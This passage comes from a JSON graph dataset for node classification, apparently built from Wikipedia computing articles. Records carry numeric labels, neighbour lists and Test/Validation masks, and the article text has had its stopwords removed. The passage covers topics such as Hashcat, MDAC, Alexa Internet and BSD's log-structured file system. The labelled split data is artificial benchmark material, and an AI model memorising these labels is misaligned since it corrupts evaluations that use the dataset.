      4664,
      2623,
      2113,
      7234,
      3142,
      8262,
      2638,
      9302,
      2140,
      7263,
      1122,
      4194,
      5730,
      7780,
      3175,
      5223,
      8810,
      4205,
      8815,
      3698,
      630,
      119,
      6774,
      8822,
      7802,
      6268,
      3197,
      5245,
      9345,
      5774,
      4241,
      7313,
      8851,
      9366,
      10909,
      6815,
      8352,
      5793,
      2210,
      6818,
      8863,
      6821,
      5798,
      7852,
      9391,
      2224,
      5297,
      2226,
      7858,
      9911,
      2745,
      8890,
      4286,
      2241,
      2243,
      9926,
      9932,
      5329,
      11474,
      4308,
      5334,
      10966,
      2264,
      2269,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      2804,
      757,
      2294,
      2805,
      5880,
      249,
      10485,
      3323,
      8700,
      5373,
      6909,
      8447,
      1798,
      6406,
      7432,
      1801,
      6926,
      6415,
      10512,
      785,
      1298,
      11539,
      7963,
      5404,
      2339,
      6950,
      2345,
      4909,
      3886,
      7983,
      309,
      8501,
      5948,
      9020,
      4928,
      6464,
      8514,
      5956,
      4423,
      7497,
      330,
      1866,
      6476,
      8523,
      7505,
      9044,
      2901,
      11604,
      344,
      2394,
      11613,
      8543,
      1376,
      1890,
      11618,
      3431,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      10624,
      3457,
      9090,
      9092,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      426,
      939,
      10669,
      1967,
      2480,
      11697,
      10675,
      1461,
      1463,
      7607,
      8120,
      8122,
      8125,
      4030,
      1985,
      9665,
      453,
      3014,
      1480,
      3529,
      5585,
      466,
      468,
      2008,
      9688,
      1499,
      6107,
      477,
      1502,
      7134,
      5090,
      995,
      7653,
      7142,
      10725,
      2536,
      9707,
      9710,
      6639,
      10734,
      9714,
      499,
      4596,
      5619,
      10746,
      508,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 732,
    "label": 5,
    "text": "Security_association:security association security association sa establishment shared security attributes two network entities support secure communication sa may include attributes cryptographic algorithm mode traffic encryption key parameters network data passed connection framework establishing security associations provided internet security association key management protocol isakmp protocols internet key exchange kerberized internet negotiation keys provide authenticated keying material sa simplex one-way channel logical connection endorses provides secure data connection network devices fundamental requirement sa arrives two entities communicate one channel take example mobile subscriber base station subscriber may subscribe one service therefore service may different service primitives data encryption algorithm public key initialization vector make things easier security information grouped logically logical group security association sa id called said base station mobile subscriber share said derive security parameters words sa logical group security parameters enable sharing information another entity",
    "neighbors": [
      9383,
      8265,
      4874,
      939,
      10831,
      10908,
      3742
    ],
    "mask": "Validation"
  },
  {
    "node_id": 733,
    "label": 4,
    "text": "Hashcat:hashcat hashcat self-proclaimed world fastest password recovery tool proprietary code base 2015 released free software versions available linux os x windows come cpu-based gpu-based variants examples hashcat-supported hashing algorithms microsoft lm hashes md4 md5 sha-family unix crypt formats mysql cisco pix hashcat made way news many times optimizations flaws discovered creator exploited subsequent hashcat releases example flaw 1password password manager hashing scheme previously hashcat used come two main variants release hashcat v3.00 gpu cpu tools merged single tool called hashcat cpu-only version became hashcat-legacy cpu gpu require opencl many algorithms supported hashcat-legacy md5 sha1 others cracked shorter time using well-documented gpu acceleration leveraged gpu-based hashcat however algorithms accelerated leveraging gpus bcrypt good example due factors data-dependent branching serialization memory name oclhashcat/cudahashcat n't catchall replacements hashcat-legacy hashcat-legacy available linux osx windows hashcat available macos windows linux gpu cpu generic opencl support allows fpgas accelerator cards hashcat offers multiple attack modes obtaining effective complex coverage hash keyspace modes traditional bruteforce attack considered outdated hashcat core team recommends mask-attack full replacement team hashcat official team hashcat software composed core hashcat members first place korelogic crack competitions defcon 2010 2012 2014 2015 derbycon 2017",
    "neighbors": [
      3937,
      7426,
      8513,
      4580,
      6916,
      7556,
      4956,
      7557,
      8867,
      4140,
      5612,
      7983,
      10135,
      6617,
      3290,
      8827,
      2716,
      63
    ],
    "mask": "None"
  },
  {
    "node_id": 734,
    "label": 1,
    "text": "Materialized_view:materialized view computing materialized view database object contains results query example may local copy data located remotely may subset rows and/or columns table join result may summary using aggregate function process setting materialized view sometimes called materialization form caching results query similar memoization value function functional languages sometimes described form precomputation forms precomputation database users typically use materialized views performance reasons i.e form optimization materialized views store data based remote tables also known snapshots c. j date regards phrase materialized view deprecated term snapshot database management system following relational model view virtual table representing result database query whenever query update addresses ordinary view virtual table dbms converts queries updates underlying base tables materialized view takes different approach query result cached concrete materialized table rather view may updated original base tables time time enables much efficient access cost extra storage data potentially out-of-date materialized views find use especially data warehousing scenarios frequent queries actual base tables expensive materialized view indexes built column contrast normal view typically possible exploit indexes columns come directly mapping indexed columns base tables often functionality offered materialized views implemented first oracle database query rewrite feature added version 8i example syntax create materialized view oracle refresh fast start sysdate postgresql version 9.3 newer natively support materialized views version 9.3 materialized view auto-refreshed populated time creation unless codice_1 used may refreshed later manually using codice_2 version 9.4 refresh may concurrent selects materialized view codice_3 used example syntax create materialized view postgresql microsoft sql server differs rdbms way implementing materialized view via concept known indexed views main difference views require refresh fact always synchronized original data tables compound view achieve necessary lines origin destination deterministic mapping limits types possible queries mechanism realised since 2000 version sql server example syntax create materialized view sql server create view mv_my_view schemabinding select col1 sum col2 total table_name group col1 go create unique clustered index xv apache kafka since v0.10.2 apache spark since v2.0 support materialized views streams data materialized views also supported sybase sql anywhere ibm db2 called materialized query tables mysql n't support materialized views natively workarounds implemented using triggers stored procedures using open-source application flexviews materialized views implemented amazon dynamodb using data modification events captured dynamodb streams",
    "neighbors": [
      2051,
      7175,
      10632,
      8201,
      9225,
      9360,
      8979,
      2068,
      10389,
      3990,
      4630,
      2456,
      1049,
      5658,
      5403,
      7446,
      4255,
      9631,
      9634,
      2339,
      4263,
      2344,
      2217,
      7080,
      8871,
      10286,
      9397,
      5051,
      3004,
      10048,
      5953,
      6850,
      1222,
      9286,
      333,
      337,
      2901,
      10326,
      2011,
      987,
      2780,
      8539,
      4065,
      9828,
      10340,
      10471,
      8810,
      6124,
      2669,
      7022,
      6383,
      2544,
      10737,
      9075,
      1146
    ],
    "mask": "Test"
  },
  {
    "node_id": 735,
    "label": 8,
    "text": "Alexa_Internet:alexa internet alexa internet inc. american web traffic analysis company based san francisco wholly owned subsidiary amazon alexa founded independent company 1996 acquired amazon 1999 250m stock toolbar collects data internet browsing behavior transmits alexa website stored analyzed basis company web traffic reporting including alexa rank according website alexa provides web traffic data global rankings information 30 million websites 2018 website visited 3 million people every month alexa internet founded april 1996 brewster kahle bruce gilliat company name chosen homage library alexandria ptolemaic egypt drawing parallel largest repository knowledge ancient world potential internet become similar store knowledge alexa initially offered toolbar gave internet users suggestions go next based traffic patterns user community company also offered context site visited registered many pages many sites pointed frequently updated alexa operations grew include archiving web pages crawled examined automated computer program nicknamed bot web crawler database served basis creation internet archive accessible wayback machine 1998 company donated copy archive two terabytes size library congress alexa continues supply internet archive web crawls 1999 company moved away original vision providing intelligent search engine alexa acquired amazon.com approximately us 250 million amazon stock alexa began partnership google early 2002 web directory dmoz january 2003 december 2005 alexa opened extensive search index web-crawling facilities third-party programs comprehensive set web services apis could used instance construct vertical search engines could run alexa servers elsewhere may 2006 google replaced windows live search provider search results december 2006 amazon released alexa image search built in-house first major application built company web platform may 2007 alexa changed api limit comparisons three websites reduce size embedded graphs flash add mandatory embedded britepic advertisements april 2007 company filed lawsuit alexa v. hornbaker stop trademark infringement statsaholic service lawsuit alexa alleged ron hornbaker stealing traffic graphs profit primary purpose site display graphs generated alexa servers hornbaker removed term alexa service name march 19 2007 november 27 2008 amazon announced alexa web search longer accepting new customers service would deprecated discontinued existing customers january 26 2009 thereafter alexa became purely analytics-focused company march 31 2009 alexa revealed major website redesign redesigned site provided new web traffic metrics—including average page views per individual user bounce rate rate users come leave webpage user time website following weeks alexa added features including visitor demographics clickstream web search traffic statistics alexa introduced new features compete web analytics services key metric published alexa internet analytics alexa traffic rank also simply known alexa rank also referred global rank alexa internet designed estimate website popularity alexa internet tooltip global rank says rank calculated combination daily visitors page views website 3-month period alexa traffic rank used monitor popularity trend website compare popularity different websites alexa ranks sites based primarily tracking sample set internet traffic—users toolbar internet explorer firefox google chrome web browsers alexa toolbar includes popup blocker stops unwanted ads search box links amazon.com alexa homepage alexa ranking website user visiting also allows user rate website view links external relevant websites early 2005 alexa stated 10 million downloads toolbar though company provide statistics active usage originally web pages ranked amongst users alexa toolbar installed could biased specific audience subgroup reluctant take part rankings caused controversies representative alexa user base typical internet behavior especially less-visited sites 2007 michael arrington provided examples alexa rankings known contradict data comscore web analytics service including ranking youtube ahead google 2007 third-party-supplied plugin firefox browser served option firefox users amazon abandoned a9 toolbar july 16 2007 alexa released official toolbar firefox called sparky 16 april 2008 many users reported drastic shifts alexa rankings alexa confirmed later day announcement released updated ranking system claiming would take account sources data beyond alexa toolbar users using alexa pro service website owners sign certified statistics allows alexa access website traffic data site owners input javascript code page website permitted user security privacy settings runs sends traffic data alexa allowing alexa display—or display depending owner preference—more accurate statistics total pageviews unique pageviews number antivirus companies assessed alexa toolbar toolbar internet explorer 7 one point flagged malware microsoft defender symantec classified toolbar trackware 2007 mcafee classified adware deeming potentially unwanted program 2005 mcafee site advisor rated alexa site green 2007 finding significant problems warned small fraction downloads ... people consider adware potentially unwanted programs 2014 though possible delete paid subscription within alexa account possible delete account created alexa web interface",
    "neighbors": [
      4623,
      5660,
      8735,
      6176,
      9768,
      560,
      3632,
      8240,
      2611,
      8244,
      77,
      590,
      8271,
      7248,
      82,
      9816,
      4704,
      3688,
      1129,
      106,
      1643,
      2156,
      3691,
      3182,
      113,
      4215,
      3191,
      6796,
      10390,
      5787,
      8865,
      2217,
      696,
      704,
      9414,
      5319,
      6856,
      8921,
      2267,
      735,
      235,
      10995,
      8962,
      8451,
      10517,
      1819,
      6429,
      11038,
      6435,
      10020,
      11556,
      11558,
      9001,
      3380,
      2870,
      7488,
      5960,
      3404,
      5461,
      7512,
      877,
      10609,
      4472,
      4473,
      2939,
      9595,
      9089,
      10629,
      3462,
      7047,
      6027,
      6028,
      6034,
      5524,
      7060,
      2459,
      5536,
      934,
      4013,
      9645,
      6580,
      10681,
      2496,
      11201,
      10185,
      1994,
      4050,
      469,
      5078,
      11221,
      10713,
      5607,
      7656,
      1001,
      1008,
      2548,
      8181,
      8183,
      2552
    ],
    "mask": "Test"
  },
  {
    "node_id": 736,
    "label": 2,
    "text": "Microsoft_Data_Access_Components:microsoft data access components microsoft data access components mdac also known windows dac framework interrelated microsoft technologies allows programmers uniform comprehensive way developing applications access almost data store components include activex data objects ado ole db open database connectivity odbc several deprecated components well microsoft jet database engine msdasql ole db provider odbc remote data services rds components also become obsolete former data access objects api remote data objects first version mdac released august 1996 time microsoft stated mdac concept stand-alone program widespread distribution method later microsoft released upgrades mdac web-based redistributable packages eventually later versions integrated microsoft windows internet explorer mdac 2.8 sp1 ceased offering mdac redistributable package throughout history mdac subject several security flaws led attacks escalated privileges attack although vulnerabilities generally fixed later versions fairly promptly current version 2.8 service pack 1 product many different versions many components deprecated replaced newer microsoft technologies mdac known windows dac windows vista latest version mdac 2.8 consists several interacting components windows specific except odbc available several platforms mdac architecture may viewed three layers programming interface layer consisting ado ado.net database access layer developed database vendors oracle microsoft ole db .net managed providers odbc drivers database component layers made available applications mdac api microsoft sql server network library proprietary access method specific microsoft sql server also included mdac developers windows applications encouraged use ado ado.net data access benefit users application program constrained choice database architecture except supported mdac naturally developers still choice writing applications directly access ole db odbc microsoft sql server network library also known net-lib used microsoft sql server read write data using many different network protocols though net-lib specific sql server microsoft includes mdac sql server uses open data services ods library communicate net-lib interfaces directly windows nt operating system line win32 subsystem sql server network library controlled use client network utility bundled sql server net-lib supported network protocol separate driver confused device driver support session layer protocol stack two general types net-lib primary secondary primary net-lib consists super socket net-lib shared memory net-lib numerous secondary net-libs including tcp/ip named pipes network libraries named pipes method communicating processes via system-persistent pipeline given identity microsoft ole db provider sql server sqloledb communicates via primary net-libs super socket net-lib deals inter-computer communications coordinates secondary net-libs – though tcp/ip secondary net-lib exception calls windows sockets 2 api directly banyan vines appletalk servernet ipx/spx giganet rpc net-libs dropped mdac 2.5 onwards network library router job managing protocols however named pipes secondary net-lib managed router super socket net-lib also handles data encryption via use windows ssl api shared memory net-lib hand manages connections multiple instances sql server exist one computer uses shared memory area communicate processes inherently secure need data encryption instances sql server exist one computer operating system allow process access instances area shared memory net-lib also able support impersonation logged user security context protocols support authenticated connections called trusted connections allows net-lib provide integrated logon authentication mechanism via use windows authentication windows authentication supported windows 98 windows ole db also called oledb ole-db allows mdac applications access different types data stores uniform manner microsoft used technology separate application data store website data store needs access done different applications need access different types sources data necessarily need know access technology-specific functionality technology conceptually divided consumers providers consumers applications need access data provider software component exposes ole db interface use component object model com ole db database access interface technology used mdac ole db providers created access simple data stores text file spreadsheet complex databases oracle sql server however different data store technology different capabilities ole db providers may implement every possible interface available capabilities available implemented use com objects ole db provider map data store technology functionality particular com interface microsoft calls availability interface provider-specific may applicable depending database technology involved additionally however providers may also augment capabilities data store capabilities known services microsoft parlance microsoft ole db provider sql server sqloledb ole db provider microsoft provides microsoft sql server version 6.5 upwards universal data link files '.udl files provide common user interface specifying connection attributes user use data link properties dialog box save connection information .udl file alternative directly specifying hand connection string consequently files provide convenient level indirection additionally dialog box specifies number alternate ole db data providers variety target applications open database connectivity odbc native interface accessed programming language usually c make calls native library mdac interface defined dll separate module driver needed database must accessed functions odbc api implemented dbms-specific drivers driver microsoft provides mdac called sql server odbc driver sqlodbc name implies designed microsoft sql server supports sql server v6.5 upwards odbc allows programs use sql requests access databases without know proprietary interfaces databases handles sql request converts request individual database system understands according microsoft sql server 2012 odbc driver updated recent server features including microsoft windows azure sql database released microsoft odbc driver sql server activex data objects ado high-level programming interface ole db uses hierarchical object model allow applications programmatically create retrieve update delete data sources supported ole db ado consists series hierarchical com-based objects collections object acts container many objects programmer directly access ado objects manipulate data send sql query database via several ado mechanisms ado made nine objects four collections collections objects ado.net latest version ado ado 2.8 often referred ado classic part mdac 2.8 stack alongside classic ado built around microsoft .net though sometimes seen evolutionary step ado fundamental structural changes made microsoft ado.net runs .net managed provider modified version ole db provider specifically designed .net object structure longer built around recordset object instead dataset object used contain data gathered multiple sources transparent programmer unlike old ado recordset dataset design promotes use disconnected data conceptually dataset object seen small in-memory relational database right allows manipulation data direction order propagate changes back database dataadapter object used transfers data data source dataset object cursors also deprecated ado.net replaced datareader object used efficiently process large list results one record time without storing mdac continually evolving component framework several components previously part since deprecated removed entirely framework jet stands joint engine technology database engine used microsoft access microsoft exchange server visual basic jet part relational database management system rdbms offered single interface software could use access microsoft databases jet also provided support security referential integrity transaction processing indexing record page locking data replication later versions jet engine extended run sql queries store character data unicode format create views allowed bi-directional replication microsoft sql server since superseded msde three modules jet one native jet isam driver jet dynamic link library dll could directly manipulate microsoft access database files mdb modified form indexed sequential access method isam database another one modules isam drivers dlls allowed access isam databases among xbase paradox btrieve foxpro files final module data access objects dao dll dao allowed programmers access jet engine basically object-oriented data language used access basic visual basic application developers access jet similarly microsoft jet ole db provider replication objects jro allowed replication jet data sources removed mdac 2.6 microsoft ole db provider odbc codice_19 ole db provider allowing activex data objects access databases via odbc driver microsoft supplied several ole-db providers indexing service active directory jet sql server oracle codice_20 internet publishing however unless otherwise directed ado defaulted using msdasql default provider mdac 2.5 oracle odbc driver msdasql supported oracle 7 partially supported oracle 8i features supported microsoft initially deprecated msdasql component 64-bit operating systems microsoft oracle odbc driver later superseded .net managed oracle provider supported oracle 9i however windows server 2008 windows vista sp1 ship 64-bit version msdasql remote data services rds allowed retrieval set data server client altered way sent back server processing popular adoption transact-sql extends sql programming constructs loops conditional statements became less necessary eventually deprecated mdac 2.7 microsoft produced soap toolkit 2.0 allows clients via open xml-based standard sqlxml designed sql server 2000 deprecated mdac 2.6 allowed microsoft relational database viewed xpath allowed data viewable xml file actually deprecated removed later versions mdac though microsoft provide downloadable component support 64-bit operating systems several components completely removed mdac microsoft longer supported microsoft released several versions mdac time distribution method varied feature-set different version mdac 1.0 first released august 1996 according microsoft mdac 1.0 existed concept coordinated stand-alone setup program mdac 1.0 stack consisted odbc 3.0 ole db 1.1 ado 1.0 advanced data connector adc 1.0 – according microsoft precursor remote data service mdac 1.5 also included odbc drivers access/jet sql server oracle databases mdac 1.0 released via several mechanisms advanced data connector shipped internet information server iis 3.0 downloadable cab file ole db 1.1 ado 1.0 shipped ole db 1.1 sdk came visual studio 97 also downloadable mdac 1.0 came active server pages came iis 3.0 also came visual interdev 1.0 mdac 1.5 released september 1997 march 1998 involved centralised distribution mechanism mdac 1.0 released microsoft internet explorer 4.0 internet client sdk 4.0 cd-rom given 1997 professional developers conference pdc five versions mdac 1.5 different versions mdac 1.5 consisted version mdac security flaw made vulnerable escalated privileges attack vulnerability caused systems iis mdac installed give unauthorized web user ability execute shell commands iis system privileged user allowed attacker use mdac tunnel sql odbc data requests public connection private back-end network multi-homed internet-connected iis system also allowed user gain unauthorized access secured non-published files iis system mdac 1.5 last data access component release supported windows nt 3.51 sp5 mdac 2.0 distributed data access 2.0 sdk included contents mdac 1.5 odbc 3.5 sdk ole db 1.5 sdk ole db olap specification also included many updates core product including security feature added rds prevented used maliciously iis server version came included windows nt 4.0 sp4 also visual studio 6.0 came full data access sdk mdac 2.1 distributed sql server 7.0 sql server 6.5 sp5 mdac 2.1 sp1 distributed internet explorer 5 mdac 2.1 sp1a ga distributed microsoft office 2000 backoffice 4.5 visual studio 98 sp3 however none versions mdac released general public via world wide web mdac 2.1 sp2 distributed microsoft website components included 2.1 version security vulnerabilities whereby unchecked buffer could allow elevated privileges attack found time later affected mdac 2.1 2.5 2.6 addressed later patch mdac 2.5 released february 17 2000 distributed windows 2000 mdac service packs released parallel windows 2000 service packs also distributed microsoft website three service packs released components included 2.5 several issues found version mdac using ole db session pooling microsoft com+ would try continuously load unload ole db conflict could arise caused ole db session pooling run 100 cpu usage later fixed microsoft published full list bugs fixed mdac 2.5 service pack 2 mdac 2.5 service pack 3 security vulnerability also existed later fixed whereby unchecked buffer found sql server driver flaw introduced mdac 2.5 sp2 mdac 2.6 released september 2000 distributed web microsoft sql server 2000 mdac 2.6 rtm sp1 released june 20 2001 sp2 released june 11 2002 distributed parallel microsoft sql server 2000 service packs could also downloaded microsoft website beginning version mdac microsoft jet microsoft jet ole db provider odbc desktop database drivers included instead could installed manually microsoft also released alert warning mdac 2.6 installed sql server 7.0 cluster install mdac 2.6 later node cluster directly installation another program may cause catastrophic failure sql server agent sql server services issue affected veritas software backup exec 9.0 windows servers installs microsoft sql server 2000 desktop engine msde 2000 database revision 4367 installed mdac version 2.6 sp2 revision 4454 installed mdac version 2.7 sp1 problem mdac 2.7 released october 2001 microsoft website refresh release issued april 2002 release windows xp microsoft website version 2.7 available u.s. english chinese traditional simplified german japanese korean brazilian portuguese czech danish greek slovak slovenian spanish finnish french hungarian italian dutch norwegian polish portuguese russian swedish turkish hebrew arabic available windows xp main feature change support microsoft 64-bit operating system however support banyan vines also dropped version mdac several known issues mdac 2.7 continued causing connectivity problems clustered servers running microsoft sql server 6.5 sql server 7.0 workaround provided microsoft creating configuring odbc data source names dsns using microsoft sql server odbc driver network library protocol might unexpectedly switch tcp/ip even dsn configured use named pipes issue found infoworld reporter randall c. kennedy identified change actually made mdac 2.6 never documented discovered testing client/server database workloads windows xp computer infoworld claims although overall server cpu utilization rose 8 percent using tcp/ip context switches per second dropped 150 percent course impossible would negative context switch rate drop either 33 60 depending planet author time writing 10-user workload unimpressed fundamental functional change default behaviour net-lib occurred without passing mention unrelated document windows xp users also sometimes experienced problems connecting sql server sql server attempts use certificates finds local computer however one certificate available know one use attempting use microsoft analysis services 2000 rtm error would sometimes appear trying browse cubes microsoft also discovered problem windows 95 windows 98 windows setup program prevented mdac installation program rolling back encountered installation error several security issues resolved microsoft mdac 2.7 david litchfield next generation security software ltd reported security vulnerability results one odbc functions mdac used connect data sources contained unchecked buffer another vulnerability fixed one whereby attacker could respond sql server discovery message broadcast clients specially crafted packet could cause buffer overflow another flaw found whereby code could executed remotely attacker responded broadcast another specially crafted packet mdac 2.8 released august 2003 distributed microsoft windows server 2003 well microsoft data access technologies website introduce new features product fixed number bugs security issues – reg file automates changes registry removed made server run unsafe mode whereby rds could exploited gain unauthorized access system new restriction imposed length shape query string also several odbc administrator changes may 23 2005 brad rhodes lead program manager microsoft data access technologies announced mdac 2.8 sp1 last stand-alone redistributable mdac microsoft ship mdac official component microsoft operating system though providing ongoing bug security fixes previously released versions web-distributable version however microsoft created new component called sql native client sqlncli stand-alone data access api combined ole db odbc libraries one dll formed independent mdac reliant state operating system – developer links library avoids situations update operating system updates mdac breaks applications built different version mdac windows 7 sp1 broken forward compatibility mdac 2.8 software compiled windows 7 sp1 relies mdac ado work windows versions prior windows 7 sp1 including windows 7 rtm vista xp microsoft provided solutions work around issue applications vba applications remain affected fix issue release february 2012 windows vista longer use mdac instead use windows dac consists updated versions ado ole db odbc components according microsoft windows dac includes changes work windows vista almost entirely functionally equivalent mdac 2.8 two ways checking version mdac installed computer windows 2000 windows xp windows server 2003 one way check via microsoft component checker program compares value installed mdac dll mdac file manifest second way check key codice_21 windows registry microsoft notes information may incorrect versions mdac prior 2.1 compared versions mdac files installed system",
    "neighbors": [
      10243,
      5636,
      9744,
      10769,
      9234,
      1043,
      5658,
      1055,
      2083,
      8227,
      4647,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      8262,
      4174,
      4178,
      83,
      9813,
      603,
      2145,
      5225,
      2669,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      6797,
      9362,
      10899,
      3224,
      4771,
      4261,
      7846,
      2221,
      10413,
      10414,
      3250,
      8391,
      8393,
      214,
      9943,
      9434,
      2783,
      4321,
      6370,
      9441,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      10486,
      6927,
      8976,
      9491,
      11030,
      5401,
      5913,
      5403,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      7983,
      11570,
      5952,
      1348,
      844,
      847,
      3923,
      2901,
      10079,
      11616,
      7523,
      1393,
      6521,
      2943,
      9609,
      9612,
      2456,
      9114,
      10654,
      8607,
      929,
      6051,
      11683,
      3496,
      7080,
      6060,
      6584,
      2493,
      7629,
      479,
      8161,
      6114,
      4074,
      9196,
      4590,
      11247,
      5104,
      3573,
      4598,
      10229,
      8188,
      2045,
      5119
    ],
    "mask": "Validation"
  },
  {
    "node_id": 737,
    "label": 2,
    "text": "Nokia_Browser_for_Symbian:nokia browser symbian nokia browser symbian formerly known web browser s60 default web browser s60 symbian mobile phone platform browser based port apple inc. ’ open-source webcore javascriptcore frameworks form webkit rendering engine apple uses safari web browser first version 2002 lacking support wireless application protocol wap wireless markup language wml adobe flash lite s60 version 2 introduced support wap wml hence nokia services wap browser default browser initial device shipments platform nokia announced porting webkit s60 browser june 2005 made available november 2006 world wide web conference nokia announced releasing source code port webkit back community supports drawbacks supports nokia browser 7.0 supported s60 5th edition devices version supports features prior nokia browser 7 releases well following additional features nokia browser 7.1 supported s60 3rd 5th edition devices new features drawbacks nokia browser 7.2 supported symbian^3 s60 3rd 5th edition platform devices new features nokia browser 7.3 pre-installed symbian anna devices like nokia e6 nokia x7 browser 7.3 also available symbian^3 devices nokia c6-01 nokia c7 nokia e7 nokia n8 part upgrade symbian^3 symbian anna s60 3rd edition s60 5th edition devices received updated browser form firmware updates version brings touch-optimized user interface addition better web standards support improved performance new features include nokia browser 7.4 pre-installed nokia belle devices nokia 600 nokia 603 nokia 700 nokia 701 browser 7.4 also available symbian^3/anna devices part upgrade symbian anna nokia belle browser 7.4 added support following features additionally user interface changed comparison v7.3 follows come nokia belle fp2 nokia 603 nokia 700 nokia 701 nokia 808",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      5659,
      6171,
      9757,
      7713,
      10791,
      9770,
      9262,
      559,
      7220,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      5707,
      7246,
      10834,
      6231,
      8281,
      6747,
      9320,
      1642,
      9834,
      9841,
      115,
      9843,
      4728,
      2684,
      637,
      1664,
      2182,
      10910,
      8351,
      5290,
      10410,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      199,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      9443,
      4326,
      5875,
      8443,
      9987,
      7943,
      4365,
      278,
      11545,
      7965,
      1834,
      7983,
      10053,
      10057,
      11082,
      2893,
      8557,
      6528,
      8577,
      3971,
      3462,
      8584,
      7572,
      5026,
      11693,
      944,
      1972,
      5054,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114
    ],
    "mask": "Test"
  },
  {
    "node_id": 738,
    "label": 9,
    "text": "Parlog:parlog parlog logic programming language designed efficient utilization parallel computer architectures semantics based first order predicate logic expresses concurrency interprocess communication indeterminacy synchronization within declarative language framework designed imperial college london steve gregory keith l. clark descendant ic prolog relational language",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 739,
    "label": 6,
    "text": "Log-structured_File_System_(BSD):log-structured file system bsd log-structured file system lfs implementation log-structured file system concept originally proposed implemented john ousterhout originally developed bsd removed freebsd openbsd netbsd implementation nonfunctional work leading 4.0 release made viable production file system on-disk format lfs borrowed ufs indirect block inode directory formats almost identical allows well-tested ufs file system code re-used current implementations lfs share higher-level ufs code lower-level code ffs since file systems share much common ufs lfs divides disk segments one active one time segment header called summary block summary block contains pointer next summary block linking segments one long chain lfs treats linear log segments necessarily adjacent disk reason larger segment sizes 384kb 1mb recommended amortize cost seeking segments whenever file directory changed lfs writes head log unlike ufs inodes lfs fixed locations inode map—a flat list inode block locations—is used track everything else inode map blocks also written log changed segment filled lfs goes fill next free clean segment segments said dirty contain live blocks blocks newer copies exist ahead log lfs garbage collector turns dirty segments clean ones copying live blocks dirty segment current segment skipping rest summary block segment contains map track live blocks generally garbage collection delayed clean segments left also deferred system idle even least-dirty segments picked collection intended avoid penalty cleaning full segments i/o bandwidth needed checkpoint usually scheduled every 30 seconds lfs writes last known block locations inode map number current segment checkpoint region fixed place disk two regions lfs alternates checkpoint written checkpoint represents last consistent snapshot file system recovery crash normal mounting work way—the file system simply reconstructs state last checkpoint resumes logging",
    "neighbors": [
      5120,
      2051,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      9762,
      5158,
      11323,
      8772,
      4708,
      8298,
      9836,
      7789,
      9333,
      6263,
      9335,
      2687,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3267,
      10951,
      9420,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      2304,
      3328,
      11012,
      2314,
      8461,
      6416,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      9004,
      302,
      11568,
      6961,
      3909,
      2378,
      4431,
      346,
      2395,
      2397,
      10596,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      11675,
      414,
      2974,
      7070,
      4012,
      1454,
      6062,
      8114,
      7603,
      1464,
      1978,
      9151,
      8643,
      7126,
      1509,
      9189,
      11256,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 740,
    "label": 2,
    "text": "Games_for_Windows:games windows games windows discontinued brand owned microsoft introduced 2006 coincide release windows vista operating system brand represents standardized technical certification program online service windows games bringing measure regulation pc game market much way console manufacturers regulate platforms branding program open first-party third-party publishers games windows promoted convention kiosks forums early 2005 promotional push culminated deal ziff davis media rename computer gaming world magazine first gfw issue published november 2006 2008 ziff davis announced magazine would cease published though online content would still updated maintained 2013 microsoft announced xbox pc marketplace would cease operations would result discontinuation games windows brand spite announcement company stated content previously purchased could still accessed via games windows – live client software games certified microsoft feature prominent games windows logo border across top packaging manner similar games developed xbox 360 software must meet certain requirements mandated microsoft order display brand packaging requirements include microsoft claimed increased sales games windows-branded games stores giving games greater focus stated planned increase marketing efforts brand certain games certified games windows brand including shadowrun uno featured cross-platform compatibility allowing gamers play across xbox 360 consoles traditional windows vista windows 7 pcs starting halo 2 may 31 2007 certain games windows titles access microsoft live network online play features including voice chat instant messaging friends lists accessed in-game menu called guide users log xbox live gamertags gain achievements play games chat across platforms games support cross-platform compatibility features including cross-platform multiplayer gaming multiplayer achievements initially required subscription xbox live gold however july 22 2008 microsoft announced games windows functionality would free existing future members early adopters technology would receive refunds previously incurred charges addition microsoft launched games windows live marketplace similar xbox live marketplace allowed users download purchase content game demos add-ons gamer pics microsoft points publisher title would determine item required purchased time microsoft announced intentions make games windows live client software interface friendly reduce technical requirements developers games explorer included versions windows vista windows 7 special folder showcases games installed user computer related information compatible game installed operating system adds shortcut game games explorer optionally download additional information game packaging content rating information e.g. esrb pegi acb cero developer game definition file information provided internet although feature discontinued since 2016 windows experience index information also displayed within interface feature removed entirely windows 10 v1803 games explorer supports custom commands games also includes shortcuts configure various operating system components may pertinent gamers audio devices display devices firewall settings game controllers windows vista games explorer allows developers expose game metadata thumbnails interface windows search shell handler games explorer fully compatible parental controls feature included windows vista windows 7 parental controls allows parents include preclude certain games played based content rating and/or title also block games played altogether compatibility typically depends age popularity game newer games better compatibility game incompatible user manually add game dragging dropping games explorer tray play technology developed microsoft windows vista allows users insert game disc optical disc drive play game installs background streams disc minimal zero caching—in manner similar game console first commercial game known use technology windows version halo 2 part games windows initiative involved ensuring xbox 360 peripherals xbox 360 controller wireless gaming receiver worked across windows platforms xbox 360 peripherals work certified games also default games included windows vista minesweeper",
    "neighbors": [
      4356,
      11524,
      5004,
      6797,
      782,
      1935,
      10900,
      4248,
